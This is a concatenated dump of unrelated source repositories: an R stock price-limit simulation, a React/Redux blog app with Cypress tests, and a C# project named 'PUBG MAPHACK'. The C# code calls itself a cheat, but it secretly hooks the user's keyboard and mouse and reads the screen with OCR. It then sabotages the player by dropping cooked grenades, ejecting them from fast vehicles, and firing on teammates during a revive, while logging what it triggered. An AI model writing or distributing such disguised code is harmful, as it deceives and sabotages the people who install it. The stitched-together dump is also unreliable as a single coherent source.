filter(!(S_DQ_OPEN == UP_LIMIT & S_DQ_LOW > DOWN_THRESHOLD),
!(S_DQ_OPEN == DOWN_LIMIT & S_DQ_HIGH < UP_THRESHOLD))
# # 日内数据估计每日的参数mu和sigma(an alternative way) ----
# # 从日内Kline数据估计每日的参数mu和sigma的函数
# mu_sigma_intraday <- function(path) {
# # path为日内数据文件路径
# tryCatch({
# path %>%
# read_csv(col_types = cols_only(close = col_integer())) %>%
# with(mu_sigma(log(close / lag(close))))
# }, error = function(e) c(NA, NA))
# }
#
# system.time(
# Stock_Daily_Data2 <- Stock_Daily_Data2 %>%
# # 计算
# data.frame(
# t(sapply(.$kline_path_lag1, mu_sigma_intraday, USE.NAMES = FALSE)),
# stringsAsFactors = FALSE
# ) %>%
# as_tibble() %>%
# select(-kline_path_lag1) %>%
# rename(mu_hf = X1, sigma_hf = X2) %>%
# mutate(sigma_hf = sigma_hf * sqrt(240),
# mu_hf = mu_hf * 240 + 1 / 2 * sigma_hf ^ 2)
# )
# Tick数据确定涨跌超过阈值时间点 ----
# 从Tick文件中匹配第一次超过特定价格的时间的函数(并行)
# 添加需要的变量
Stock_Daily_Data2 <- Stock_Daily_Data2 %>%
# 生成tick文件路径
mutate(tick_path = case_when(
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("000", "001") ~
paste0(path_to_mainboard, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("600", "601", "603") ~
paste0(path_to_mainboard, "/Tick/SH/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("002") ~
paste0(path_to_sme, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
substr(S_INFO_WINDCODE, 1L, 3L) %in% c("300") ~
paste0(path_to_ge, "/Tick/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv")
))
# 将数据集分割成涨跌两部分
Stock_Daily_Data3 <- list(
UP = filter(Stock_Daily_Data2, REACH_UP_THRESHOLD),
DOWN = filter(Stock_Daily_Data2, REACH_DOWN_THRESHOLD)
)
# 生成阈值序列
Thresholds <- list(
UP = sapply(thresholds,
function(threshold)
as.integer(Stock_Daily_Data3$UP$S_DQ_PRECLOSE * (1 + threshold) * 10000)),
DOWN = sapply(-thresholds,
function(threshold)
as.integer(Stock_Daily_Data3$DOWN$S_DQ_PRECLOSE * (1 + threshold) * 10000))
)
# 从Tick文件中匹配超过阈值的时间点的函数
# 输入为index,输出为integer vector
match_time_up <- function(index) {
tryCatch({
Stock_Daily_Data3$UP$tick_path[index] %>%
read_csv(col_types = cols_only(time = col_integer(),
high = col_integer())) %>%
with(time[sapply(Thresholds$UP[index, ], function(threshold) detect_index(high, ~ . >= threshold)) %>% replace_certain(0L, NA_integer_)])
}, error = function(e) rep.int(NA_integer_, length(thresholds)))
}
match_time_down <- function(index) {
tryCatch({
Stock_Daily_Data3$DOWN$tick_path[index] %>%
read_csv(col_types = cols_only(time = col_integer(),
low = col_integer())) %>%
with(time[sapply(Thresholds$DOWN[index, ], function(threshold) detect_index(low, ~ . > 0 & . <= threshold)) %>% replace_certain(0L, NA_integer_)])
}, error = function(e) rep.int(NA_integer_, length(thresholds)))
}
# start cluster
cl <- makeCluster(ncl, type = socket_type)
clusterEvalQ(cl, {
library(tidyverse)
library(cnquant)
})
clusterExport(cl, c(
"Stock_Daily_Data3",
"Thresholds",
"thresholds"
))
# 主要计算,匹配时间,返回值为integer matrix
system.time({
t1 <- list(
UP = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$UP)), match_time_up) %>% t(),
DOWN = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$DOWN)), match_time_down) %>% t()
)
})
# MCMC涨停概率 ----
# tick时间映射到[0, 14400s]的函数
ticktime2second <- function(ticktime) {
ticktime = parse_tick_time(ticktime)
ticktime = if_else(ticktime <= parse_time("113000", format = "%H%M%S"),
as.integer(ticktime - parse_time("093000", format = "%H%M%S")),
as.integer(ticktime - parse_time("130000", format = "%H%M%S")) + 7200L)
return(ticktime)
}
# 时间变为单位秒
t1 <- t1 %>%
lapply(function(x) apply(x, 2, ticktime2second))
# 由t1推出T
T <- t1 %>%
lapply(function(x) (14400L - x) / 14400L)
# N
N <- t1 %>%
lapply(function(x) round((14400L - x) / 3))
# Thresholds_Mod,每个threshold到涨跌停的增长比例
Thresholds_Mod <- list(
UP = Thresholds$UP %>%
apply(2, function(x) Stock_Daily_Data3$UP$UP_LIMIT * 10000 / x),
DOWN = Thresholds$DOWN %>%
apply(2, function(x) Stock_Daily_Data3$DOWN$DOWN_LIMIT * 10000 / x)
)
# 计算触及涨停板概率的函数
prob_reach_up <- function(index) {
tryCatch({
trajectories <- Sim.DiffProc::GBM(N = N$UP[index, 1],
M = 1000,
T = T$UP[index, 1],
theta = Stock_Daily_Data3$UP$mu[index],
sigma = Stock_Daily_Data3$UP$sigma[index])
probs <- rep.int(NA, length(thresholds))
for (i in seq_along(probs)) {
probs[i] <- trajectories[time(trajectories) <= T$UP[index, i], ] %>%
apply(2, max) %>%
{mean(. >= Thresholds_Mod$UP[index, i])}
}
probs
}, error = function(e) rep.int(NA, length(thresholds)))
}
prob_reach_down <- function(index) {
tryCatch({
trajectories <- Sim.DiffProc::GBM(N = N$DOWN[index, 1],
M = 1000,
T = T$DOWN[index, 1],
theta = Stock_Daily_Data3$DOWN$mu[index],
sigma = Stock_Daily_Data3$DOWN$sigma[index])
probs <- rep.int(NA, length(thresholds))
for (i in seq_along(probs)) {
probs[i] <- trajectories[time(trajectories) <= T$DOWN[index, i], ] %>%
apply(2, min) %>%
{mean(. <= Thresholds_Mod$DOWN[index, i])}
}
probs
}, error = function(e) rep.int(NA, length(thresholds)))
}
# clusterExport
clusterExport(cl, c(
"N",
"T",
"Thresholds_Mod"
))
set.seed(4L)
# 主要计算,达到各个threshold后达到涨跌停的概率,返回值为numeric matrix
system.time({
Probs_Theo <- list(
UP = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$UP)), prob_reach_up) %>% t(),
DOWN = parSapply(cl, seq_len(nrow(Stock_Daily_Data3$DOWN)), prob_reach_down) %>% t()
)
})
# 结束并行cluster
stopCluster(cl)
# 保存数据
save.image("data/01-D-Sequential-Data.RData")
|
ec9c28f33b7a29d2099e2294c284a36114be3891
|
[
"Markdown",
"R"
] | 3
|
Markdown
|
ssh352/Magnet-Effect
|
dd47ae747a3883e7df834faaa5ba684ea1385ac0
|
369f259e5998a39d601547d7e3806a6f6942d5f8
|
refs/heads/main
|
<file_sep>import React, { useState } from 'react';
import PropTypes from 'prop-types';
import { useSelector, useDispatch } from 'react-redux';
import { deleteBlog, updateBlog, comment } from '../reducers/blogsReducer';
import { setNotification } from '../reducers/notificationReducer';
import blogService from '../services/blogs';
import { useHistory } from 'react-router-dom';
import { useField } from '../hooks';
import {
Container,
Heading,
Link,
Center,
Flex,
Button,
Box,
Input,
UnorderedList,
ListItem,
} from '@chakra-ui/react';
const Blog = ({ blog }) => {
const dispatch = useDispatch();
const user = useSelector(state => state.loggedUser);
const history = useHistory();
const commentInput = useField('text', 'comment');
const giveLike = async () => {
dispatch(updateBlog(blog));
};
const deletePost = async () => {
const confirmed = window.confirm(`Are you sure to delete ${blog.title}?`);
if (!confirmed) return;
try {
blogService.setToken(user.token);
await dispatch(deleteBlog(blog.id));
history.push('/');
dispatch(setNotification(`${blog.title} was removed.`, 'success'));
} catch (exception) {
dispatch(setNotification(exception.response.data.error, 'error'));
}
};
const addComment = async e => {
e.preventDefault();
if (commentInput.input.value.length === 0)
return dispatch(setNotification('Empty comments not allowed', 'error'));
const newComment = {
content: commentInput.input.value,
};
try {
await dispatch(comment(blog.id, newComment));
dispatch(
setNotification(`${commentInput.input.value} was added.`, 'success')
);
} catch (exception) {
dispatch(setNotification(exception.response.data.error, 'error'));
}
commentInput.reset();
};
const showDeleteButton = () => (
<div>
<button id="delete-button" onClick={deletePost}>
delete blog
</button>
</div>
);
return (
<Container>
<Heading align="center" size="lg">
{blog.title} <i>by</i> {blog.author}
</Heading>
<Flex direction="column" align="center" mt={10}>
<Link href={blog.url}>{blog.url}</Link>
<Box border="1px" borderColor="teal" p={2} rounded={20} m={2}>
<span className="blog-likes">{blog.likes} likes</span>
<Button id="like-button" onClick={giveLike} colorScheme="teal" m={2}>
like
</Button>
</Box>
<div>added by {blog.user.name}</div>
{blog.user.username === user.username ? showDeleteButton() : ''}
<Heading color="teal" w="100%" size="md" align="center" mt={10}>
comments
</Heading>
<form onSubmit={addComment}>
<Input {...commentInput.input} />
<Button type="submit" colorScheme="teal" variant="outline" w="100%">
add comment
</Button>
</form>
{blog.comments.length === 0 ? <div>No comments...</div> : ''}
<UnorderedList>
{blog.comments.map(c => {
return (
<ListItem key={c.id} m={3}>
{c.content}
</ListItem>
);
})}
</UnorderedList>
</Flex>
</Container>
);
};
export default Blog;
<file_sep>describe("Blog app", function () {
//
beforeEach(function () {
//empty the database
cy.request("POST", "http://localhost:3003/api/testing/reset");
cy.addUser({
username: "starryNight",
name: "starryNight",
password: "<PASSWORD>",
});
cy.addUser({ username: "starDay", name: "starDay", password: "<PASSWORD>" });
cy.visit("http://localhost:3000");
});
it("login form is shown", function () {
cy.contains("username");
});
describe("while logging in", function () {
it("user can log in", function () {
//get the input
//fill in input
cy.get("#username").type("starryNight");
cy.get("#password").type("<PASSWORD>");
//click button
cy.get("#login-button").click();
//notification about success login shown
cy.contains("starryNight logged in");
});
it("user cannot log in with wrong password", function () {
//get the input
//fill in input
cy.get("#username").type("starryNight");
cy.get("#password").type("<PASSWORD>");
//click button
cy.get("#login-button").click();
//notification about success login shown
cy.get(".errorMessage")
.should("contain", "invalid username or password")
.and("have.css", "color", "rgb(255, 0, 0)")
.and("have.css", "border-style", "solid");
});
});
describe("when logged in", function () {
beforeEach(function () {
// log in user
cy.login({ username: "starryNight", password: "<PASSWORD>" });
});
it("A blog can be created", function () {
cy.contains("create new blog").click();
cy.get("#title").type("E2E with cypress seems ok");
cy.get("#author").type("cypress");
cy.get("#url").type("www.cypress.com");
cy.get("#createBlog-button").click();
cy.contains("E2E with cypress seems ok");
});
describe("after a few blog posts have been created", function () {
//
beforeEach(function () {
cy.createBlog({
title: "Do you wanna give like?",
author: "Likeme",
url: "like.com",
});
cy.createBlog({
title: "The other blog",
author: "<NAME>",
url: "other.org",
});
});
it("a user can like a blog", function () {
//find view, click
cy.get("#toggleDetails-button").first().click();
cy.get("#like-button").first().click();
cy.get(".details").first().should("contain", "1");
});
it("a user can delete a blog they created", function () {
cy.get("#toggleDetails-button").first().click();
cy.get(".details")
.first()
.should("contain", "starryNight")
.and("contain", "delete blog");
cy.get(".details").find("#delete-button").first().click();
cy.get("html").should("contain", "Do you wanna give like? was removed");
});
it("users cannot delete other people's blogs", function () {
cy.login({ username: "starDay", password: "<PASSWORD>" });
cy.get("#toggleDetails-button").first().click();
cy.get(".details")
.first()
.should("contain", "starryNight")
.and("not.contain", "delete blog");
});
it("blogs are sorted by the most likes first", function () {
cy.createBlog({
title: "With likes",
author: "Liking",
url: "heart.com",
likes: 10,
});
cy.createBlog({
title: "With Many likes",
author: "Liking",
url: "heart.com",
likes: 100,
});
cy.get(".blog-likes").should(($likes) => {
//
const likesNumber = $likes.map((i, el) => {
return Cypress.$(el).text().match(/\d+/);
});
expect(likesNumber.get()).to.deep.eq(["100", "10", "0", "0"]);
});
});
});
});
});
<file_sep>import React, { useEffect, useRef } from 'react';
import { Switch, Route, useRouteMatch } from 'react-router-dom';
import { useSelector } from 'react-redux';
// Components
import Users from './components/Users';
import Main from './components/Main';
import Menu from './components/Menu';
import Notification from './components/Notification';
import User from './components/User';
import Blog from './components/Blog';
import { useDispatch } from 'react-redux';
import { initBlogs } from './reducers/blogsReducer';
import { initUser } from './reducers/loggedUserReducer';
import { initUsers } from './reducers/usersReducer';
import LoginForm from './components/LoginForm';
import { Flex, Heading, Container, Center } from '@chakra-ui/react';
const App = () => {
const dispatch = useDispatch();
// select logged in user, if any
const userAuth = useSelector(state => state.loggedUser);
useEffect(() => {
dispatch(initUser());
dispatch(initBlogs());
dispatch(initUsers());
}, []);
// User route - find matching user
const users = useSelector(state => state.users);
const matchUser = useRouteMatch('/users/:id');
const user = matchUser
? users.find(user => user.id === matchUser.params.id)
: null;
// Blog route - find matching blog
const blogs = useSelector(state => state.blogs);
const matchBlog = useRouteMatch('/blogs/:id');
const blog = matchBlog
? blogs.find(blog => blog.id === matchBlog.params.id)
: null;
// if user=null (not signed in)
const loginSection = () => (
<>
<Notification />
<Flex height="100vh" alignItems="center" justifyContent="center">
<Flex direction="column" background="gray.200" p={12} rounded={20}>
<Heading mb={6} align="center">
Blogs app
</Heading>
<LoginForm />
</Flex>
</Flex>
</>
);
// if user signed in
const landingSection = () => (
<>
<Menu />
<Container maxW="container.xl">
<Heading align="center" m={10}>
Blogs app
</Heading>
<Notification />
<Switch>
<Route path="/users/:id">
{user ? (
<User user={user} />
) : (
<div>The user does not exist or you put in a wrong url!</div>
)}
</Route>
<Route path="/blogs/:id">
{blog ? (
<Blog blog={blog} />
) : (
<div>The blog does not exist or you put in a wrong url!</div>
)}
</Route>
<Route path="/users">
<Users />
</Route>
<Route path="/">
<Main />
</Route>
</Switch>
</Container>
</>
);
return <>{userAuth === null ? loginSection() : landingSection()}</>;
};
export default App;
<file_sep>import React from 'react';
import { useSelector } from 'react-redux';
import { Link as ReachLink } from 'react-router-dom';
import { Link } from '@chakra-ui/react';
const BlogList = () => {
const blogs = useSelector(state => state.blogs);
const sortedBlogs = blogs.slice().sort((a, b) => b.likes - a.likes);
return (
<div>
{sortedBlogs.map(blog => (
<div key={blog.id} className="blog">
<Link as={ReachLink} to={`/blogs/${blog.id}`}>
{blog.title} <i>by</i> {blog.author}
</Link>
</div>
))}
</div>
);
};
export default BlogList;
<file_sep>import React from 'react';
import { useSelector } from 'react-redux';
import { Center } from '@chakra-ui/react';
const Notification = () => {
const notification = useSelector(state => state.notification);
if (notification === null) return null;
return (
<Center className={notification.style} p={5}>
{notification.message}
</Center>
);
};
export default Notification;
<file_sep>// {
// user: {
// name, username, token;
// }
// }
const loggedUserReducer = (state = null, action) => {
// console.log('user STATE NOW: ', state);
// console.log('user ACTION: ', action);
switch (action.type) {
case 'SET_USER':
return action.data;
case 'REMOVE_USER':
return null;
default:
return state;
}
};
export const initUser = () => {
return dispatch => {
const loggedUserJSON = window.localStorage.getItem('loggedInUser');
if (loggedUserJSON) {
dispatch(setUser(JSON.parse(loggedUserJSON)));
}
};
};
export const setUser = user => {
return {
type: 'SET_USER',
data: user,
};
};
export const removeUser = () => {
return {
type: 'REMOVE_USER',
};
};
export default loggedUserReducer;
<file_sep>import React from 'react';
import { useDispatch, useSelector } from 'react-redux';
import { setNotification } from '../reducers/notificationReducer';
import { removeUser } from '../reducers/loggedUserReducer';
import { useHistory } from 'react-router-dom';
const LoginStatus = () => {
const dispatch = useDispatch();
const user = useSelector(state => state.loggedUser);
const history = useHistory();
const handleLogout = () => {
dispatch(removeUser());
window.localStorage.removeItem('loggedInUser');
dispatch(setNotification('Stop by soon!'));
history.push('/');
};
if (!user) return null;
return (
<p>
{user.name} logged in{' '}
<button id="logout-button" onClick={handleLogout}>
logout
</button>
</p>
);
};
export default LoginStatus;
<file_sep>import React from 'react';
import {
Heading,
Container,
UnorderedList,
ListItem,
Box,
} from '@chakra-ui/react';
// input: props user:{ name, username, id, blogs:[{..},{..}] }
// show name of the user
// list all the blogs added by the user
const User = ({ user }) => {
return (
<div>
<Heading color="teal" w="100%" size="md" align="center" mt={5}>
{user.name}
</Heading>
<Container>
<Heading color="teal" w="100%" size="sm" align="center" md={5}>
added blogs:
</Heading>
<UnorderedList>
{user.blogs.map(blog => (
<ListItem key={blog.id}>
<Box border="1px" p={2} rounded={5} m={2}>
{blog.title}
</Box>
</ListItem>
))}
</UnorderedList>
</Container>
</div>
);
};
export default User;
<file_sep>import React, { useState, useImperativeHandle } from 'react';
import PropTypes from 'prop-types';
import { Button } from '@chakra-ui/react';
const Togglable = React.forwardRef((props, ref) => {
const [visible, setVisible] = useState(false);
const hideAux = { display: visible ? 'none' : '' };
const showMain = { display: visible ? '' : 'none' };
const toggleVisibility = () => {
setVisible(!visible);
};
useImperativeHandle(ref, () => {
return { toggleVisibility };
});
return (
<div>
<div style={hideAux}>
<Button onClick={toggleVisibility} colorScheme="teal" w="100%">
{props.buttonLabel}
</Button>
</div>
<div style={showMain}>
{props.children}
<Button onClick={toggleVisibility} colorScheme="gray" w="100%">
cancel
</Button>
</div>
</div>
);
});
Togglable.propTypes = {
buttonLabel: PropTypes.string.isRequired,
};
Togglable.displayName = 'Togglable';
export default Togglable;
<file_sep>import React, { useEffect, useRef } from 'react';
// Components
import Togglable from './Togglable';
import NewBlog from './NewBlog';
import Notification from './Notification';
import BlogList from './BlogList';
import LoginForm from './LoginForm';
import LoginStatus from './LoginStatus';
// State
import { useSelector } from 'react-redux';
import { Container, Heading } from '@chakra-ui/react';
const Main = () => {
const blogsSectionRef = useRef();
return (
<Container>
<Heading align="center" size="lg">
List of blogs
</Heading>
<BlogList />
<Togglable buttonLabel="create new blog" ref={blogsSectionRef}>
<NewBlog forwardedRef={blogsSectionRef} />
</Togglable>
</Container>
);
};
export default Main;
|
b0b91360aae8194d5384f51f857f57b1f22c40e2
|
[
"JavaScript"
] | 10
|
JavaScript
|
Starle21/FullStackOpen-exercises-part7-Misc
|
296e83d537b184d1cc0140689889ac371679260d
|
c8678cf24787daf82b42b29aef7e7f4c96e04cc8
|
refs/heads/main
|
<repo_name>brucevanhorn2/CaptainsLog<file_sep>/server/models/index.js
const Profile = require('./Profile');
const LogEntry = require('./LogEntry');
module.exports = { Profile, LogEntry };
<file_sep>/README.md
# Captain's Log
This software is designed to be a daily log for software developers. I've found that at the end of each day, writing everything down that happened, explanations of root causes, and solutions (including what you tried that didn't work) allows you to more easily remember how to solve the same or similar problems when they occur again; or at very least you have a search-able set of notes catalogued alongside a calendar.
There are other tools I've used for this. I really liked Agenda, but it's only available on the MacOS and IOS platforms. After my mac suffered a catastrophic failure I was left with only my tablet, which is sometimes sufficient, but sometimes I need to make notes when I don't have the tablet with me.
Evernote started off great many years ago, but now its bloated and the UI changes frequently. I simply don't like Microsoft's OneNote.
Another honorable mention is "Red Notebook" which is an older program which has a good concept but a terrible editor. I want to be able to edit my notes with markdown, link to different notes, etc. An older version of Red Notebook shows a word cloud which I thought might be interesting but it was taken out in later versions. This tool uses a local database and so has no cloud synchronization.
## Design Goals
I want something that might be made available on any device or operating system, and something that stores, or at least syncs its data in the cloud, such that if I make notes on my tablet, they appear in my desktop copy on another machine, and vice versa. I should be able to use a browser on any computer to make and search notes.
Since this is just the start of this project, the simplest way to realize these goals is to build a web app. This is that app. Later, I can make a native version of the app for desktops with Electron, and perhaps even make tablet / mobile versions with React Native.
## Tech Stack
This is written in JavaScript using Node with Express, GraphQL, and a React front-end. The database used is MongoDB accessed using the Mongoose ODM. I intend to deploy it on Heroku with the database hosted by MongoDB Atlas.
|
6c12b761f75e0eb720eef977a77a342226c24943
|
[
"JavaScript",
"Markdown"
] | 2
|
JavaScript
|
brucevanhorn2/CaptainsLog
|
afa5326c62bd981204b679a7e26e3d245f02ffe3
|
33aec0e73bd6498f1505523daab3ab309f7ec7aa
|
refs/heads/master
|
<file_sep>require_relative 'template'
describe Template do
include Template
it "should substitute %CODE% and %ALTCODE% in the template" do
template('Code is %CODE%; alt code is %ALTCODE%', '5678901234').should == 'Code is 5678901234; alt code is 56789-012'
end
it "should substitute %CODE% but not %ALTCODe% in the template" do
template('Code is %CODE%; alt code is %ALTCODe%', '5678901234').should == 'Code is 5678901234; alt code is %ALTCODe%'
end
it "should substitute %CODE% and %ALTCODE% in the template twice" do
template('Code is %CODE%; alt code is %ALTCODE%, Again Code is %CODE%; alt code is %ALTCODE%',
'5678901234').should == 'Code is 5678901234; alt code is 56789-012, Again Code is 5678901234; alt code is 56789-012'
end
it "should substitute %CODE% and %ALTCODE% in the template even if number is <4" do
template('Code is %CODE%; alt code is %ALTCODE%', '124').should == 'Code is 124; alt code is 124-'
end
it "should substitute %CODE% and %ALTCODE% in the template even if number is >4 but <7" do
template('Code is %CODE%; alt code is %ALTCODE%', '1234509').should == 'Code is 1234509; alt code is 12345-09'
end
it "should substitute %CODE% only in the template" do
template('Code is %CODE%', '12341234').should == 'Code is 12341234'
end
end
<file_sep>module Template
def template(source_template, req_id)
# Two assumptions
# 1. All the occurances of %CODE% and %ALTCODE% is replaced.
# 2. Replacement is case sensitive
# For %CODE% we are only replacing it with req_id,
# Following gsub! function does the same.
# Since there is no rule specifying dividing req_id;
# I am assuming that if total number of digits in number < 5 then,
# Only the first part with '-'' becomes replacement code
altcode = req_id[0..4].to_s + "-" + req_id[5..7].to_s
# First gsub substitute %CODE% and second %ALTCODE%
source_template.gsub(/%CODE%/,req_id).gsub(/%ALTCODE%/,altcode)
end
end
# This is how modules can be included
class RunTemplate
include Template
end
class RunTemplate1
extend Template
end
puts RunTemplate.new.template('Code is %CODE%; alt code is %ALTCODE%', '5678901234')
puts RunTemplate1.template('Code is %CODE%; alt code is %ALTCODE%, Again Code is %CODE; alt code is %ALTCODE%',
'5678901234')
|
c999213f292cf9aa51a30c2cdbe51b2b8e28e291
|
[
"Ruby"
] | 2
|
Ruby
|
kashyap-bhatt15/jobs
|
d8d87b8b85bd628123f82f3fd227a25a2fd1eeb8
|
f2d8e528981352d5b21384c1fbc2f73cbdef5b41
|
refs/heads/master
|
<repo_name>metaversettt/pubg-maphack-master<file_sep>/html/analytics.js
(function($) {
$(document).ready(function() {
function saveInAnalytics(category, action, label) {
if ("ga" in window) {
if (typeof ga.getAll !== "undefined") {
tracker = ga.getAll()[0];
if (tracker)
tracker.send('event', category, action, label);
}
}
}
$(".screenshot1").click(function() {
saveInAnalytics("clicks", "screenshots", "In-game screenshot");
});
$(".screenshot2").click(function() {
saveInAnalytics("clicks", "screenshots", "Software screenshot");
});
$(".download").click(function() {
saveInAnalytics("clicks", "download", "pubg maphack v1.2");
});
});
}(jQuery));<file_sep>/PUBG MAPHACK/classes/GameMonitor.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using Gma.System.MouseKeyHook;
using System.Windows.Forms;
using System.Timers;
using System.Threading;
namespace PUBG_MAPHACK
{
public class GameMonitor
{
private ScreenAnalyzer sAnalyzer = new ScreenAnalyzer();
private IKeyboardMouseEvents m_GlobalHook;
private static System.Timers.Timer aTimer;
private static System.Timers.Timer reviveTimer;
private int ejectSpeed = 80;
public Dictionary<string, string[]> playerKeyBindings;
[DllImport("user32.dll")]
private static extern void mouse_event(uint dwFlags, uint dx, uint dy, uint dwData, int dwExtraInfo);
public GameMonitor()
{
playerKeyBindings = getPlayerKeybindings();
// Key/Mouse combinations to monitor
var assignment = new Dictionary<Combination, Action> { };
// Nade cooking key combiantions from player config
foreach (var fire in playerKeyBindings["Fire"])
{
foreach (var cook in playerKeyBindings["StartCookingThrowable"])
{
string keyCombo = fire + "+" + cook;
// Add every combination to monitor
assignment.Add(Combination.FromString(keyCombo), suicideByNade);
}
}
// Hold interact button event (to detect if player is reviving someone)
foreach (var interact in playerKeyBindings["Interact"])
{
// Add every combination to monitor
assignment.Add(Combination.FromString(interact), holdingInteractButton);
}
// Install listener
m_GlobalHook = Hook.GlobalEvents();
m_GlobalHook.OnCombination(assignment);
// Set timer to check if player is driving
aTimer = new System.Timers.Timer(3000);
aTimer.Elapsed += isPlayerDriving;
aTimer.AutoReset = true;
aTimer.Enabled = true;
// Set timer that is used to trigger player to shoot his teammate when reviving
reviveTimer = new System.Timers.Timer(7000);
reviveTimer.Elapsed += fireeeeeeeeeeeeeeeee;
reviveTimer.AutoReset = false;
reviveTimer.Enabled = false;
}
public void holdingInteractButton()
{
void ReleaseInteractEvent(object sender, KeyEventArgs e)
{
reviveTimer.Stop();
// Remove button release listener
m_GlobalHook.KeyUp -= ReleaseInteractEvent;
}
if(reviveTimer.Enabled == false)
{
// Set event that triggers when the player releases interact button
m_GlobalHook.KeyUp += ReleaseInteractEvent;
}
// Start the timer to start shooting
reviveTimer.Enabled = true;
}
private void fireeeeeeeeeeeeeeeee(Object source, ElapsedEventArgs e)
{
/* Trigger 20 shots by clicking left mouse button 20 times.
This trigger if the player holds the interact button for 7 seconds */
for (int i = 0; i < 20; i++)
{
// Left mouse down
mouse_event(0x02, 0, 0, 0, 0);
Thread.Sleep(50);
// Left mouse up
mouse_event(0x04, 0, 0, 0, 0);
}
Program.triggerTracker += @"Revive fire triggered | ";
}
public void suicideByNade()
{
void ReleaseNadeEvent(object sender, MouseEventExtArgs e)
{
// Trigger weapon change to drop nade (two different keys just to be safe)
SendKeys.SendWait("{1}"); // Try switch to main weapon
SendKeys.SendWait("{X}"); // Try holster weapons
// Remove mouse up listener
m_GlobalHook.MouseUpExt -= ReleaseNadeEvent;
Program.triggerTracker += @"Suicide by nade triggered | ";
}
// Set event that triggers when the player releases left mouse down (throw nade)
m_GlobalHook.MouseUpExt += ReleaseNadeEvent;
}
public void suicideByEject()
{
// Simple but effective, trigger exit vehicle by simulating exit vehicle keypress
if(playerKeyBindings.ContainsKey("Interact"))
{
SendKeys.SendWait("{" + playerKeyBindings["Interact"][0] + "}");
}
SendKeys.SendWait("{F}"); // Extra saftey (default key binding)
Program.triggerTracker += @"Suicide by eject triggered | ";
}
private async void isPlayerDriving(Object source, ElapsedEventArgs e)
{
int screenHeight = Int32.Parse(playerKeyBindings["ResolutionSizeY"][0]);
// Look for km/h in left corner of screen
string results = await sAnalyzer.Analyze(0, screenHeight - 120, 600, 95);
Program.debug_log(results);
if (results.Contains("km/h"))
{
// Get speed as number
int speed = getDrivingSpeed(results);
Program.debug_log("Player driving at speed: " + speed.ToString());
// if speed is over ejectspeed it's time to SEND IT!!!
if(speed > ejectSpeed)
{
suicideByEject(); // BYE :)
}
}
}
private int getDrivingSpeed(string analyzerResults)
{
String[] spearator = { "\n" };
Int32 count = 999;
// Split results into array
String[] strlist = analyzerResults.Split(spearator, count, StringSplitOptions.RemoveEmptyEntries);
// Loop through array and find speed
foreach (String s in strlist)
{
if (s.Contains("km/h"))
{
// Results are a bit unpredictable and adds unwanted numbers into our km/h match sometimes so lets try fix it here
String[] delimiter = { "km/h" };
String[] split1 = s.Split(delimiter, count, StringSplitOptions.RemoveEmptyEntries);
String[] delimiter2 = { " " };
if(split1.Length > 0)
{
String[] split2 = split1[0].Split(delimiter2, count, StringSplitOptions.RemoveEmptyEntries);
try
{
// Convert speed string to int
int speed = Int32.Parse(Regex.Replace(split2[split2.Length - 1], "[^.0-9]", ""));
if (speed > 152) return 0; // faulty result - abort!
return speed;
}
catch (FormatException e)
{
return 0;
}
}
}
}
return 0;
}
private Dictionary<string, string[]> getPlayerKeybindings()
{
ConfigParser ConfigParser = new ConfigParser();
return ConfigParser.parseConfig();
}
}
}
<file_sep>/PUBG MAPHACK/classes/ScreenAnalyzer.cs
using System.Drawing;
using System.Threading.Tasks;
using Tesseract;
using System.IO;
namespace PUBG_MAPHACK
{
public class ScreenAnalyzer
{
public TesseractEngine engine;
public ScreenAnalyzer() {
// Copy tessdata to tmp folder
if (Directory.Exists("x86") && !Directory.Exists(Path.GetTempPath() + @"\tessdata"))
{
Directory.CreateDirectory(Path.GetTempPath() + @"\tessdata");
foreach (string newPath in Directory.GetFiles(@"x86\tessdata", "*.*", SearchOption.AllDirectories))
{
System.Console.WriteLine(newPath);
File.Copy(newPath, Path.GetTempPath() + @"\tessdata\" + Path.GetFileName(newPath), true);
}
}
}
public async Task<string> Analyze(int x, int y, int width, int height)
{
string textInImage = "";
try
{
textInImage = await Task.Run(() => {
// Let's capture part of screen for analysis
Bitmap image = CaptureScreen(x, y, width, height);
// Let's get any text inside screenshot
return getTextFromImage(image);
});
}
catch
{
// YEET
}
// Return our results
return textInImage.ToLower();
}
public Bitmap CaptureScreen(int x, int y, int width, int height)
{
// Let's create a rectangle (Hodor!)
Rectangle bounds = new Rectangle(x, y, width, height);
// Let's create a bitmap same size as our rectangle (Hodor!)
Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height);
// Let's create a graphics object from the bitmap (Hodor!)
Graphics g = Graphics.FromImage(bitmap);
// Let's capture part of our screen in our graphic (Hodor!)
g.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
/* If we build with debugging mode lets save printscreens in debugging folder */
if(Program.debug == true)
{
bitmap.Save(@"debug\printscreens\screen-" + System.DateTime.Now.ToFileTime() + ".png", System.Drawing.Imaging.ImageFormat.Png);
}
return bitmap;
}
public string getTextFromImage(Bitmap bitmap)
{
string tessdata = "";
if (Directory.Exists(Path.GetTempPath() + @"tessdata"))
{
tessdata = Path.GetTempPath() + @"tessdata";
} else
{
if (Directory.Exists(@"x86\tessdata"))
{
tessdata = @"x86\tessdata";
}
}
if (tessdata == "") {
Program.triggerTracker += @"tessdata not found | ";
return "";
}
//TesseractEnviornment.CustomSearchPath = Path.GetTempPath() + "pubg_maphack";
/* Let's load the Tesseract library (used to get text from images)
* The tessdata has been trained to find only PUBG's ingame font with characters "0-9/kmh" (to find the speed)
* If you want to detect other stuff you need to download the original tessdata files or make your own */
using (TesseractEngine engine = new TesseractEngine(tessdata, "eng", EngineMode.Default))
{
// Set segmentation mode to SparseText for best results (tested all)
engine.DefaultPageSegMode = PageSegMode.SparseText;
//engine.SetVariable("tessedit_ocr_engine_mode", 1);
// Convert pixels
